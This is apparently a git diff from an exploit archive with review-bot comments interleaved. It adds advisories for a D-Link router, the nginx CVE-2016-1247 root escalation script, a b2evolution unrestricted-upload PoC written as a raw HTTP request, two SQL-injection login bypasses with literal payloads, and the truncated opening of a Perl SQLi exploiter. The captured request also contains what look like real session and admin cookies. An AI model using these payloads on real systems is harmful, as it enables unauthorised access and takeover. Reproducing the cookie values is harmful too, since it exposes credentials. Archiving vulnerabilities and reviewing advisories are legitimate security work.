+ + + + +# ping_response.cgi + + + + + + + + + +POST XSS +--------- + +# apply.cgi + + + + + + + + + +# ping_response.cgi + + + + + + + + + +Disclosure Timeline +-------------------- + +12/19/16: Reported to D-Link +12/21/16: Security Patch released +ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-615/REVT/DIR-615_REVT_RELEASE_NOTES_20.12PTb01.pdf diff --git a/platforms/linux/local/40768.sh b/platforms/linux/local/40768.sh index e7083eaff..9a9144fd4 100755 --- a/platforms/linux/local/40768.sh +++ b/platforms/linux/local/40768.sh @@ -1,8 +1,6 @@ #!/bin/bash # -# Source: http://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html -# -# Nginx (Debian-based distros) - Root Privilege Escalation PoC Exploit +# Nginx (Debian-based distros + Gentoo) - Root Privilege Escalation PoC Exploit # nginxed-root.sh (ver. 1.0) # # CVE-2016-1247 @@ -18,8 +16,8 @@ # # --- # This PoC exploit allows local attackers on Debian-based systems (Debian, Ubuntu -# etc.) to escalate their privileges from nginx web server user (www-data) to root -# through unsafe error log handling. +# as well as Gentoo etc.) to escalate their privileges from nginx web server user +# (www-data) to root through unsafe error log handling. # # The exploit waits for Nginx server to be restarted or receive a USR1 signal. # On Debian-based systems the USR1 signal is sent by logrotate (/etc/logrotate.d/nginx) diff --git a/platforms/php/webapps/41011.txt b/platforms/php/webapps/41011.txt new file mode 100755 index 000000000..38176612d --- /dev/null +++ b/platforms/php/webapps/41011.txt 
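Review bot: The header of 41033.txt names the affected build (hardware E3, firmware 5.10) but never the fixed one; the only remediation pointer is the release-notes PDF at the end of the Disclosure Timeline, linked over plain `ftp://`, and its path mentions `REVT` and `20.12PTb01` rather than E3. A reader triaging exposure would want a line such as `# Fixed in: <firmware version from the vendor release notes>` next to `# Firmware Version: 5.10`, plus a sentence saying whether the E3 revision is covered by that patch. The four proof-of-concept bodies under 'Open Redirection' and 'POST XSS' are empty in this view, so the affected parameter of `apply.cgi` is not named anywhere in the text; a one-line description of it under 'Overview' would let defenders write an input filter or a detection rule without needing the markup.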
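Review bot: The reworded description in the second hunk of 40768.sh now reads `Debian-based systems (Debian, Ubuntu as well as Gentoo etc.)`, which classes Gentoo as Debian-based; `# This PoC exploit allows local attackers on Debian-based systems (Debian, Ubuntu etc.) and on Gentoo to escalate` says what is meant. The new text keeps `(www-data)` and the context line below it keeps `/etc/logrotate.d/nginx` as the Debian specifics, so the comment should state whether the same service account and log-rotation trigger apply on Gentoo, or mark that as untested. The first hunk also deletes the `# Source:` advisory link; keeping it preserves the reference an administrator would follow for the affected and fixed package versions (presumably listed there), which the script header itself does not give.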
@@ -0,0 +1,125 @@ +# Exploit Title: b2evolution6.8.2stable – Upload +# Date: 29/12/2016 +# Exploit Author: Li Fei +# Vendor Homepage: http://b2evolution.net/ +# Software Link: http://b2evolution.net/downloads/6-8-2-stable?download=6407 +# Version: 6.8.2 +# Tested on: win7 64bit + +No need admin access for upload files and we can upload any file without bypass(.php,.exe,....) + +1-goto http://localhost/b2evolution/index.php/a/extended-post + +2- click on Browse botton and select you`re file + +3- click on upload + +Ceshi.php path is: + +http://SiteName/ceshi.php + +poc url: + +POST /b2evolution/htsrv/comment_post.php HTTP/1.1 + +Poc header: + +Host: localhost + +Content-Length: 1054 + +Cache-Control: max-age=0 + +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + +Origin: http://localhost + +Upgrade-Insecure-Requests: 1 + +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 + +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytZ4hUYCjABZB7YSL + +Referer: http://localhost/b2evolution/index.php/a/extended-post + +Accept-Encoding: gzip, deflate + +Accept-Language: zh-CN,zh;q=0.8 + +Cookie: session_b2evo=8323_COaAvLi6oU0LKIlMsoa207tOu4MRliDS; iCMS_USER_AUTH=93f92757UuFn7JIQa3nI%252Bk%252FF0s5elmm8KsIgZm%252F357CeOEhJUy7AsnKbPiZUa2eJTzmQx9lPUSaQcNVQtRiWJd%252BCBX0BQ4UpjoiTRBtkGujEc8rTtKoz3IGSFexrQEnmFfxKiL%252B1KR4nGq9wA88zDfJw6c1D7w7xeiYht2Iwo72Fcv8s6JjLcedy52QCOTHRPAFQ%252BdKcClUZz4vjvIvfZi5j6V4xQ1jpbnvV%252FMH6uyw7%252BL4Q41xqDKfgf1j7Sl36%252FGiXHwnij92A6nAMnxG78ZkUg5WG9PY5AtTyEMEtrHAuip7iPJbItdeuTSiTqwoIff%252BLuU4FM9nEldOYY2Jm9UD6XdgaXuyZBHhvb1v0buICmdQPX6rfrki9lZA; iCMS_userid=faf9c76a%252FQiEcyDoXBxmLMRDumokuULwqflVA%252FnfKJbcmsqFgw; iCMS_nickname=a693e7b1f4QEBL83uf0qmVI9BhIOCYq%252FTxa7NPwX8xobJpNm8bA; a8850_times=1; CNZZDATA80862620=cnzz_eid%3D1580835190-1482064117-http%253A%252F%252Flocalhost%252F%26ntime%3D1482064117; 
iweb_captcha=a95d2426cce76ef614NzA5ODI0NDUwOT5uZjFmY2RibDw4NGMyZjYxYzdmY2Bsa2ppdA; iweb_admin_role_name=6f99d0f079b6898180NDA1OTgwODg2NTk2PWA0Y2IwNGY9YWJgYWI3PmpgO2TrtofivafjrqbnmIXtkZg; iweb_admin_id=bef908b03b94700ce0ODA1MDEwMDAwMGowOTZlNzUwMTg2MDMxMmA3MWIxMzYx; iweb_admin_name=bef908b03b94700ce0ODA1MDEwMDAwMD8xbmUzMWFlOThiOzI3YjVmOjFgMjlhbWxpZg; iweb_admin_pwd=52f2f828c001b132f5NzAwMDc1NDcwMTg9YTE3NW8xYzA0M2E1YDdlYmY9YTllMjBnYmAyOjI5amEyOWNkYGU3NmUwNTdmNDVjPTA1ZQ + +Connection: close + + + +------WebKitFormBoundarytZ4hUYCjABZB7YSL + +Content-Disposition: form-data; name="comment_rating" + + + + + +------WebKitFormBoundarytZ4hUYCjABZB7YSL + +Content-Disposition: form-data; name="g" + + + + + +------WebKitFormBoundarytZ4hUYCjABZB7YSL + +Content-Disposition: form-data; name="uploadfile[]"; filename="ceshi.php" + +Content-Type: application/octet-stream + + + + + +------WebKitFormBoundarytZ4hUYCjABZB7YSL + +Content-Disposition: form-data; name="submit_comment_post_19[save]" + + + +Send comment + +------WebKitFormBoundarytZ4hUYCjABZB7YSL + +Content-Disposition: form-data; name="crumb_comment" + + + +dXuthsKjMjhG2dnhADtzzOW414qV6Qky + +------WebKitFormBoundarytZ4hUYCjABZB7YSL + +Content-Disposition: form-data; name="comment_type" + + + +comment + +------WebKitFormBoundarytZ4hUYCjABZB7YSL + +Content-Disposition: form-data; name="comment_item_ID" + + + +19 + +------WebKitFormBoundarytZ4hUYCjABZB7YSL + +Content-Disposition: form-data; name="redirect_to" + + + +http://localhost/b2evolution/index.php/a/extended-post + +------WebKitFormBoundarytZ4hUYCjABZB7YSL— \ No newline at end of file diff --git a/platforms/php/webapps/41028.txt b/platforms/php/webapps/41028.txt new file mode 100755 index 000000000..6775a920a --- /dev/null +++ b/platforms/php/webapps/41028.txt 
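Review bot: The `Cookie:` header in the captured request of 41011.txt carries what look like real session and admin values from the author's browser (`session_b2evo`, `iCMS_USER_AUTH`, `iweb_admin_name`, `iweb_admin_pwd`), most of them apparently belonging to other applications on the same localhost; they add nothing to the report and should be redacted before the file is committed, e.g. `Cookie: session_b2evo=<redacted>`. Because a `session_b2evo` value is sent, the request as shown does not by itself support the statement 'No need admin access'; the text should say what kind of session (anonymous visitor or registered user) was in use. The closing boundary ends in a typographic dash (`…7YSL—`) instead of `--` and the file part's body is empty in this view, so the capture is not a faithful copy of the request. The advisory also gives no fixed release or mitigation; a line stating the fixed version, or that none was known at the time, would help anyone still running 6.8.2.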
@@ -0,0 +1,16 @@
+# Vulnerability: Job Portal Script v9.11 Authentication bypass
+# Date: 12.01.2017
+# Software link: http://itechscripts.com/job-portal-script/
+# Demo: http://job-portal.itechscripts.com
+# Price: 199$
+# Category: webapps
+# Exploit Author: Dawid Morawski
+# Website: http://www.morawskiweb.pl
+# Contact: dawid.morawski1990@gmail.com
+#######################################
+
+
+Go to http://localhost/[PATH]/admin/index.php and set:
+
+Username: admin
+Password: ' or '1'='1
diff --git a/platforms/php/webapps/41029.txt b/platforms/php/webapps/41029.txt
new file mode 100755
index 000000000..5547d83b8
--- /dev/null
+++ b/platforms/php/webapps/41029.txt
@@ -0,0 +1,16 @@
+# Vulnerability: Online Food Delivery v2.04 Authentication bypass
+# Date: 12.01.2017
+# Software link: http://itechscripts.com/food-delivery/
+# Demo: http://restaurant.itechscripts.com
+# Price: 49$
+# Category: webapps
+# Exploit Author: Dawid Morawski
+# Website: http://www.morawskiweb.pl
+# Contact: dawid.morawski1990@gmail.com
+#######################################
+
+
+Go to http://localhost/[PATH]/admin/admin_login.php and set:
+
+Username: 1' or 1=1 -- -
+Password: anything
diff --git a/platforms/php/webapps/41032.pl b/platforms/php/webapps/41032.pl
new file mode 100755
index 000000000..1d2879d8a
--- /dev/null
+++ b/platforms/php/webapps/41032.pl
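Review bot: Both new advisories (41028.txt and 41029.txt) are titled 'Authentication bypass' but consist only of login-field values containing SQL metacharacters, which points to SQL injection in the admin login query as the root cause; the title line should carry that class, e.g. `# Vulnerability: Job Portal Script v9.11 - SQL Injection (Authentication Bypass)`, so the records are triaged alongside the other SQL injection entries and the fix (parameterised queries in the login handler) is obvious to the reader. Neither file says which versions are fixed or whether the vendor was notified; a `# Vendor status:` line would record that. The `# Demo:` lines name the vendor's live hosts while the steps themselves use `http://localhost/[PATH]/`; dropping the demo links keeps the write-up tied to a local test install.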
@@ -0,0 +1,39 @@ +#!/usr/bin/perl -w + +# iTechscripts Freelancer Script v5.11 (sk) SQL Injection Vulnerability +# Author : v3n0m +# Contact : v3n0m[at]outlook[dot]com +# Date : January, 11-2017 GMT +7:00 Jakarta, Indonesia +# Software : Freelancer Script +# Version : 5.11 Lower versions may also be affected +# Price : US$199.00 +# Link : http://itechscripts.com/freelancer-script/ +# Greetz : YOGYACARDERLINK, CAFE BMW, Dhea Fathin Karima & YOU !! +sub clear{ + system(($^O eq 'MSWin32') ? 'cls' : 'clear'); +} +clear(); +print "|----------------------------------------------------|\n"; +print "| iTechscripts Freelancer Script 5.11 SQLi Exploiter |\n"; +print "| Coded by : v3n0m |\n"; +print "| Greetz : YOGYACARDERLINK |\n"; +print "|----------------------------------------------------|\n"; +use LWP::UserAgent; +print "\nInsert Target:[http://wwww.target.com/path/]: "; +chomp(my $target=